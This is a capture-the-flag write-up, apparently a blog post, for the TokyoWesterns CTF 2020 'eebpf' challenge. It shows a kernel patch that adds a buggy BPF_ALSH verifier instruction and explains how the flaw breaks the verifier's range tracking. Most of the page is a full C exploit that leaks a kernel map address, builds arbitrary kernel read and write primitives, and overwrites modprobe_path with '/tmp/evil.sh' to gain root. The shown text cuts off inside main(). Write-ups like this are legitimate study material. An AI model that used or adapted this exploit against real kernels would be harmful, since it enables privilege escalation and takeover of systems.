for="594782631"> <span class="collapsable-code__language">diff</span> <span class="collapsable-code__title">TokyoWesternsCTF2020-eebpf-patch.diff</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-diff" > <code>diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/include/uapi/linux/bpf.h buildroot-2020.08-rc3_original/output/build/linux-5.4.58/include/uapi/linux/bpf.h 27d26 &lt; #define BPF_ALSH 0xe0 /* sign extending arithmetic shift left */ diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/tnum.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/tnum.c 42,52d41 &lt; struct tnum tnum_alshift(struct tnum a, u8 min_shift, u8 insn_bitness) &lt; { &lt; if (insn_bitness == 32) &lt; //Never reach here now. &lt; return TNUM((u32)(((s32)a.value) &lt;&lt; min_shift), &lt; (u32)(((s32)a.mask) &lt;&lt; min_shift)); &lt; else &lt; return TNUM((s64)a.value &lt;&lt; min_shift, &lt; (s64)a.mask &lt;&lt; min_shift); &lt; } &lt; diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/verifier.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/verifier.c 4867,4897d4866 &lt; case BPF_ALSH: &lt; if (umax_val &gt;= insn_bitness) { &lt; /* Shifts greater than 31 or 63 are undefined. &lt; * This includes shifts by a negative number. &lt; */ &lt; mark_reg_unknown(env, regs, insn-&gt;dst_reg); &lt; break; &lt; } &lt; &lt; /* Upon reaching here, src_known is true and &lt; * umax_val is equal to umin_val. &lt; */ &lt; if (insn_bitness == 32) { &lt; //Now we don&#39;t support 32bit. Cuz im too lazy. &lt; mark_reg_unknown(env, regs, insn-&gt;dst_reg); &lt; break; &lt; } else { &lt; dst_reg-&gt;smin_value &lt;&lt;= umin_val; &lt; dst_reg-&gt;smax_value &lt;&lt;= umin_val; &lt; } &lt; &lt; dst_reg-&gt;var_off = tnum_alshift(dst_reg-&gt;var_off, umin_val, &lt; insn_bitness); &lt; &lt; /* blow away the dst_reg umin_value/umax_value and rely on &lt; * dst_reg var_off to refine the result. &lt; */ &lt; dst_reg-&gt;umin_value = 0; &lt; dst_reg-&gt;umax_value = U64_MAX; &lt; __update_reg_bounds(dst_reg); &lt; break;</code></pre></div> <p>And related location is following:</p> <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>kernel version: <code>5.4.58</code></li> <li>unprivileged_bpf_disabled: <code>0</code></li> </ul> <h3 id="patch-file">Patch file</h3> <p>The important part is following:</p> <div class="collapsable-code"> <input id="594782631" type="checkbox" /> <label for="594782631"> <span class="collapsable-code__language">diff</span> <span class="collapsable-code__title">TokyoWesternsCTF2020-eebpf-patch.diff</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-diff" > <code>diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/include/uapi/linux/bpf.h buildroot-2020.08-rc3_original/output/build/linux-5.4.58/include/uapi/linux/bpf.h 27d26 &lt; #define BPF_ALSH 0xe0 /* sign extending arithmetic shift left */ diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/tnum.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/tnum.c 42,52d41 &lt; struct tnum tnum_alshift(struct tnum a, u8 min_shift, u8 insn_bitness) &lt; { &lt; if (insn_bitness == 32) &lt; //Never reach here now. &lt; return TNUM((u32)(((s32)a.value) &lt;&lt; min_shift), &lt; (u32)(((s32)a.mask) &lt;&lt; min_shift)); &lt; else &lt; return TNUM((s64)a.value &lt;&lt; min_shift, &lt; (s64)a.mask &lt;&lt; min_shift); &lt; } &lt; diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/verifier.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/verifier.c 4867,4897d4866 &lt; case BPF_ALSH: &lt; if (umax_val &gt;= insn_bitness) { &lt; /* Shifts greater than 31 or 63 are undefined. &lt; * This includes shifts by a negative number. &lt; */ &lt; mark_reg_unknown(env, regs, insn-&gt;dst_reg); &lt; break; &lt; } &lt; &lt; /* Upon reaching here, src_known is true and &lt; * umax_val is equal to umin_val. &lt; */ &lt; if (insn_bitness == 32) { &lt; //Now we don&#39;t support 32bit. Cuz im too lazy. &lt; mark_reg_unknown(env, regs, insn-&gt;dst_reg); &lt; break; &lt; } else { &lt; dst_reg-&gt;smin_value &lt;&lt;= umin_val; &lt; dst_reg-&gt;smax_value &lt;&lt;= umin_val; &lt; } &lt; &lt; dst_reg-&gt;var_off = tnum_alshift(dst_reg-&gt;var_off, umin_val, &lt; insn_bitness); &lt; &lt; /* blow away the dst_reg umin_value/umax_value and rely on &lt; * dst_reg var_off to refine the result. &lt; */ &lt; dst_reg-&gt;umin_value = 0; &lt; dst_reg-&gt;umax_value = U64_MAX; &lt; __update_reg_bounds(dst_reg); &lt; break;</code></pre></div> <p>And related location is following:</p> <ul> <li><a href="https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/tnum.c#L42"><code>tnum_alshift</code></a></li> <li><a href="https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4866">Add verification routine to <code>adjust_scalar_min_max_vals</code></a></li> </ul> <h3 id="vulnerability">Vulnerability</h3> <p>As we can see, when we use <code>BPF_ALSH</code>, <code>dst_reg-&gt;smin_value &lt;&lt;= umin_val; dst_reg-&gt;smax_value &lt;&lt;= umin_val;</code> is executed. And because type of <code>smin_value</code> and <code>smax_value</code> is <code>s64</code>, we can make <code>smin_value &gt; smax_value</code>.</p> <h2 id="exploit">Exploit</h2> <h3 id="making-invalid-range">Making invalid range</h3> <p>My step for making invalid range is following:</p> <ol> <li>Load element from bpf_map (we call it <code>e</code>) <ol> <li>Its actual value is 1.</li> <li>Its tnum may be (.val=0, .mask=0xffffffffffffffff).</li> </ol> </li> <li>Do <code>e</code> &amp; 0x1fffffffffffffff. <ol> <li>Its actual value is 1.</li> <li>Its tnum may be (.val=0, .mask=0x1fffffffffffffff).</li> </ol> </li> <li>Do left shift to <code>e</code> by 3. <ol> <li>Its actual value is 8.</li> <li>Its tnum may be (.val=0, .mask=0xfffffffffffffff8).</li> <li>Its min and max value is 0 and 0xfffffffffffffff8.</li> </ol> </li> <li>Add 8 to <code>e</code>. <ol> <li>It actual value is 0x10.</li> <li>Its min and max value is 8 and 0. <ol> <li>Explained later.</li> </ol> </li> </ol> </li> <li>Add (.val=0, .mask=8; min=0, max=8) to <code>e</code>. <ol> <li>Now <code>e</code> has (actual_value, verification_value) = (0x10, 8).</li> </ol> </li> <li>Substract 8 from <code>e</code>. <ol> <li>Now <code>e</code> has (act_val, veri_val) = (8, 0).</li> </ol> </li> </ol> <h4 id="why-e8-does-make-min8-max0-">Why <code>e</code>+=8 does make min=8, max=0 ??</h4> <p>First, we check related functions (codes):</p> <div class="collapsable-code"> <input id="739216485" type="checkbox" checked /> <label for="739216485"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">TokyoWesternsCTF2020-eebpf-addition_code_path.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4600 static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env, struct bpf_insn *insn, struct bpf_reg_state *dst_reg, struct bpf_reg_state src_reg) { // ... case BPF_ADD: ret = sanitize_val_alu(env, insn); if (ret &lt; 0) { verbose(env, &#34;R%d tried to add from different pointers or scalars\n&#34;, dst); return ret; } if (signed_add_overflows(dst_reg-&gt;smin_value, smin_val) || signed_add_overflows(dst_reg-&gt;smax_value, smax_val)) { // ... } else { dst_reg-&gt;smin_value += smin_val; dst_reg-&gt;smax_value += smax_val; } if (dst_reg-&gt;umin_value + umin_val &lt; umin_val || dst_reg-&gt;umax_value + umax_val &lt; umax_val) { dst_reg-&gt;umin_value = 0; dst_reg-&gt;umax_value = U64_MAX; } else { // ... } dst_reg-&gt;var_off = tnum_add(dst_reg-&gt;var_off, src_reg.var_off); break; // ... __reg_deduce_bounds(dst_reg); __reg_bound_offset(dst_reg); return 0; } // @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/tnum.c#L62 struct tnum tnum_add(struct tnum a, struct tnum b) { u64 sm, sv, sigma, chi, mu; sm = a.mask + b.mask; sv = a.value + b.value; sigma = sm + sv; chi = sigma ^ sv; mu = chi | a.mask | b.mask; return TNUM(sv &amp; ~mu, mu); } // @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L939 /* Uses signed min/max values to inform unsigned, and vice-versa */ static void __reg_deduce_bounds(struct bpf_reg_state *reg) { /* Learn sign from signed bounds. * If we cannot cross the sign boundary, then signed and unsigned bounds * are the same, so combine. This works even in the negative case, e.g. * -3 s&lt;= x s&lt;= -1 implies 0xf...fd u&lt;= x u&lt;= 0xf...ff. */ if (reg-&gt;smin_value &gt;= 0 || reg-&gt;smax_value &lt; 0) { reg-&gt;smin_value = reg-&gt;umin_value = max_t(u64, reg-&gt;smin_value, reg-&gt;umin_value); reg-&gt;smax_value = reg-&gt;umax_value = min_t(u64, reg-&gt;smax_value, reg-&gt;umax_value); return; } // ... }</code></pre></div> <p>When add 8 to <code>e</code>, <code>e</code> is (smin=umin=0, smax=umax=0xfffffffffffffff8; .val=0, .mask=0xfffffffffffffff8). So and since <code>signed_add_overflows(dst_reg-&gt;smin_value, smin_val) || signed_add_overflows(dst_reg-&gt;smax_value, smax_val)</code> is false and <code>dst_reg-&gt;umin_value + umin_val &lt; umin_val || dst_reg-&gt;umax_value + umax_val &lt; umax_val</code> is true, <code>dst_reg-&gt;smin_value += smin_val; dst_reg-&gt;smax_value += smax_val;</code> and <code>dst_reg-&gt;umin_value = 0; dst_reg-&gt;umax_value = U64_MAX;</code> is executed. Then, <code>e</code> is (smin=8, smax=0, umin=0, umax=U64_MAX).</p> <p>And return value of <code>tnum_add</code> is (.val=0, .mask=0xfffffffffffffff8). So after <code>dst_reg-&gt;var_off = tnum_add(dst_reg-&gt;var_off, src_reg.var_off);</code>, <code>e</code> is (smin=8, smax=0, umin=0, umax=U64_MAX; .val=0, .mask=0xfffffffffffffff8).</p> <p>But in <code>__reg_deduce_bounds</code>, <code>reg-&gt;smin_value &gt;= 0 || reg-&gt;smax_value &lt; 0</code> is true, <code>reg-&gt;smin_value = reg-&gt;umin_value = max_t(u64, reg-&gt;smin_value, reg-&gt;umin_value);</code> and <code>reg-&gt;smax_value = reg-&gt;umax_value = min_t(u64, reg-&gt;smax_value, reg-&gt;umax_value);</code> is performed. Because <code>reg-&gt;smin_value == 8</code>, <code>reg-&gt;umin_value == 0</code>, <code>reg-&gt;smax_value == 0</code> and <code>reg-&gt;umax_value == U64_MAX</code>, register&rsquo;s min and max value is set by <code>reg-&gt;?min_value = max_t(u64, 8, 0)</code> and <code>reg-&gt;?max_value = min_t(u64, 0, U64_MAX)</code>.</p> <p>Because of this reasons, after <code>e</code>+=8, <code>e</code> will be (min=8, max=0).</p> <h3 id="leak-struct-bpf_map-address">Leak <code>struct bpf_map</code> address</h3> <p>In <code>adjust_ptr_min_max_vals</code> function, if <code>off_reg-&gt;smin_value &gt; off_reg-&gt;smax_value</code>, the pointer is marked as unknown. And the type of unknown register is scalar, we can leak its value.</p> <p>See followings:</p> <ul> <li><a href="https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4379">https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4379</a></li> <li><a href="https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L999">https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L999</a></li> </ul> <h3 id="aaraaw-primitives">AAR/AAW primitives</h3> <p>We can use the technique using <code>bpf_skb_load_bytes</code> because of scalar which has invalid range. Using this techinuqe, we can set the value on stack without verification by using invalid <code>len</code> argument. Originally <code>bpf_skb_load_bytes</code> changes values from <code>to</code> to <code>to+len</code>. So, the values are marked as unknown. But with invalid <code>len</code>, we can set values with marked as known (invalid verification).</p> <p>So, we can use this.</p> <h3 id="exploit-code">Exploit code</h3> <div class="collapsable-code"> <input id="276481593" type="checkbox" checked /> <label for="276481593"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">TokyoWesternsCTF2020-eebpf-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;asm-generic/socket.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/bpf.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/socket.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;time.h&gt; #include &lt;unistd.h&gt; #include &#34;bpf_insn.h&#34; #define BPF_ALSH 0xe0 #define KERNEL_BASE 0xffffffff81000000 #define BPF_MAP_OPS_OFFSET (0xffffffff81a0dec0 - KERNEL_BASE) #define MODPROBE_OFFSET (0xffffffff81c2e800 - KERNEL_BASE) void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } int bpf(int cmd, union bpf_attr* attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int bpf_map_create(int val_size, int max_entries) { union bpf_attr attr = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = sizeof(int), .value_size = val_size, .max_entries = max_entries, }; int map_fd = bpf(BPF_MAP_CREATE, &amp;attr); if (map_fd &lt; 0) { fatal(&#34;bpf(BPF_MAP_CREATE)&#34;); } return map_fd; } int bpf_map_update(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;attr); if (res &lt; 0) { fatal(&#34;bpf(BPF_MAP_UPDATE_ELEM)&#34;); } return res; } int bpf_map_lookup(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; return bpf(BPF_MAP_LOOKUP_ELEM, &amp;attr); } int mapfd; uint64_t map_addr; static uint64_t leak_bpf_map_addr(int do_print_verifier_log) { char verifier_log[0x10000]; uint64_t val = 0; bpf_map_update(mapfd, 0, &amp;val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x8, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x8), // map_lookup_elem(mapfd, &amp;key) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_5, BPF_REG_0), BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0), BPF_MOV64_REG( BPF_REG_0, BPF_REG_6), // r0 = r6 == 0 == (.val=0, .mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_0, 1), // r0 = r0 &amp; 1 == 0 == (.val=0, .mask=1) BPF_ALU64_IMM( BPF_ALSH, BPF_REG_0, 63), // r0 = r0 &lt;&lt; 63 == 0 == (.val=0, .mask=0x8000000000000000); // smin=0, smax=0x8000000000000000 BPF_MOV64_REG(BPF_REG_1, BPF_REG_5), // r1 = r5 == map_elem BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_0), // r1 = r1 + r0; Because r0&#39;s smin &gt; s0&#39;s smax, // r1 will be marked as unknown. BPF_MOV64_REG(BPF_REG_0, BPF_REG_1), // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x8, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x8), // arg3(&amp;val) BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x10), BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, BPF_ANY), // map_update_elem(mapfd, &amp;key, &amp;val, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s&#34;, verifier_log); puts(&#34;============[failed reason]============&#34;); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } // Trigger the BPF program write(socks[1], &#34;UNIGURI&#34;, 7); bpf_map_lookup(mapfd, 0, &amp;val); close(socks[0]); close(socks[1]); close(progfd); if (do_print_verifier_log) { puts(&#34;============[verifier log]============&#34;); printf(&#34;%s&#34;, verifier_log); puts(&#34;============[verifier log]============&#34;); } return val - 0xd0; } static void aaw64(uint64_t addr, uint64_t val) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x8), // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // map_lookup_elem(mapfd, &amp;key) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_5, BPF_REG_0), // r5 = map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0), // r6 = *map_elem == 1 BPF_MOV64_REG( BPF_REG_0, BPF_REG_6), // r0 = r6 == (.val=0, .mask=0xffffffffffffffff) BPF_MOV64_IMM(BPF_REG_1, -1), // r1 = 0xffffffffffffffff BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 3), // r1 = r1 &gt;&gt; 3 == 0x1fffffffffffffff BPF_ALU64_REG(BPF_AND, BPF_REG_0, BPF_REG_1), // r0 = r0 &amp; r1 == (actual_val=1; .val=0, // .mask=0x1fffffffffffffff) BPF_ALU64_IMM(BPF_ALSH, BPF_REG_0, 3), // r0 = r0 &lt;&lt; 3 == (actual_val=8; .val=0, // .mask=0xfffffffffffffff8; // umin=0, umax=0xfffffffffffffff8) BPF_ALU64_IMM( BPF_REG_0, BPF_ADD, 8), // r0 = r0 + 8 == (actual_val=0x10; .val=0, .mask=0x8; umin=0x8, // umax=0). Because of integer overflow in umax. BPF_MOV64_REG(BPF_REG_1, BPF_REG_6), // r1 = r6 == [map_elem] BPF_ALU64_IMM( BPF_AND, BPF_REG_1, 0x08), // r1 = r1 &amp; 0x08 == (.val=0, .mask=0x8; umin=0, umax=0x8) BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), // r0 = r0 + r1 == (umin=0x8, umax=0x8) == // constant 8 (but, it&#39;s actually 0x10) BPF_ALU64_IMM( BPF_ADD, BPF_REG_0, -0x8), // r0 = r0 - 0x8 == constant 0 (but, it&#39;s actually 0x8) BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), // r7 = r0 // From now, r7 is marked as constant 0 but it&#39;s actually 0x08 // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_7), // arg4 = r7 == (actual_val=0x8; val=0, mask=0) BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4, 1), // arg4 = 1 * arg4 == (actual_val=0x8; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 8), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x8, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x8, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0x10), // arg3(to) = addr BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg3 = fp-0x18 == addr // arg4(len) BPF_MOV64_IMM(BPF_REG_ARG4, 8), // skb_load_bytes(skb, 0x10, addr, 8) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s&#34;, verifier_log); puts(&#34;============[failed reason]============&#34;); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr, val}; write(socks[1], buf, sizeof(buf)); close(socks[0]); close(socks[1]); close(progfd); } static uint64_t aar64(uint64_t addr) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x8), // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // map_lookup_elem(mapfd, &amp;key) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_5, BPF_REG_0), // r5 = map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0), // r6 = *map_elem == 1 BPF_MOV64_REG( BPF_REG_0, BPF_REG_6), // r0 = r6 == (.val=0, .mask=0xffffffffffffffff) BPF_MOV64_IMM(BPF_REG_1, -1), // r1 = 0xffffffffffffffff BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 3), // r1 = r1 &gt;&gt; 3 == 0x1fffffffffffffff BPF_ALU64_REG(BPF_AND, BPF_REG_0, BPF_REG_1), // r0 = r0 &amp; r1 == (actual_val=1; .val=0, // .mask=0x1fffffffffffffff) BPF_ALU64_IMM(BPF_ALSH, BPF_REG_0, 3), // r0 = r0 &lt;&lt; 3 == (actual_val=8; .val=0, // .mask=0xfffffffffffffff8; // umin=0, umax=0xfffffffffffffff8) BPF_ALU64_IMM( BPF_REG_0, BPF_ADD, 8), // r0 = r0 + 8 == (actual_val=0x10; .val=0, .mask=0x8; umin=0x8, // umax=0). BPF_MOV64_REG(BPF_REG_1, BPF_REG_6), // r1 = r6 == [map_elem] BPF_ALU64_IMM( BPF_AND, BPF_REG_1, 0x08), // r1 = r1 &amp; 0x08 == (.val=0, .mask=0x8; umin=0, umax=0x8) BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), // r0 = r0 + r1 == (umin=0x8, umax=0x8) == // constant 8 (but, it&#39;s actually 0x10) BPF_ALU64_IMM( BPF_ADD, BPF_REG_0, -0x8), // r0 = r0 - 0x8 == constant 0 (but, it&#39;s actually 0x8) BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), // r7 = r0 // From now, r7 is marked as constant 0 but it&#39;s actually 0x08 // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_7), // arg4 = r7 == (actual_val=0x8; val=0, mask=0) BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4, 1), // arg4 = 1 * arg4 == (actual_val=0x8; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 8), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x8, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x8, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, &amp;key, &amp;val, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s&#34;, verifier_log); puts(&#34;============[failed reason]============&#34;); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr}; write(socks[1], buf, sizeof(buf)); bpf_map_lookup(mapfd, 0, &amp;map_val); close(socks[0]); close(socks[1]); close(progfd); return map_val; } int main() { mapfd = bpf_map_create(sizeof(uint64_t), 1); map_addr = leak_bpf_map_addr(0); printf(&#34;[+] map_addr = 0x%016lx\n&#34;, map_addr); uint64_t kernel_base = aar64(map_addr) - BPF_MAP_OPS_OFFSET; printf(&#34;[+] kernel_base: 0x%016lx\n&#34;, kernel_base); const char* new_modprobe = &#34;/tmp/evil.sh&#34;; const size_t new_modprobe_len = strlen(new_modprobe); printf(&#34;[*] Overwrite modprobe to %s\n&#34;, new_modprobe); for (size_t i = 0; i &lt; new_modprobe_len; i += 8) { aaw64(kernel_base + MODPROBE_OFFSET + i, *(uint64_t*)(new_modprobe + i)); } { int fd = open(&#34;/proc/sys/kernel/modprobe&#34;, O_RDONLY); if (fd &lt; 0) { fatal(&#34;open(/proc/sys/kernel/modprobe)&#34;); 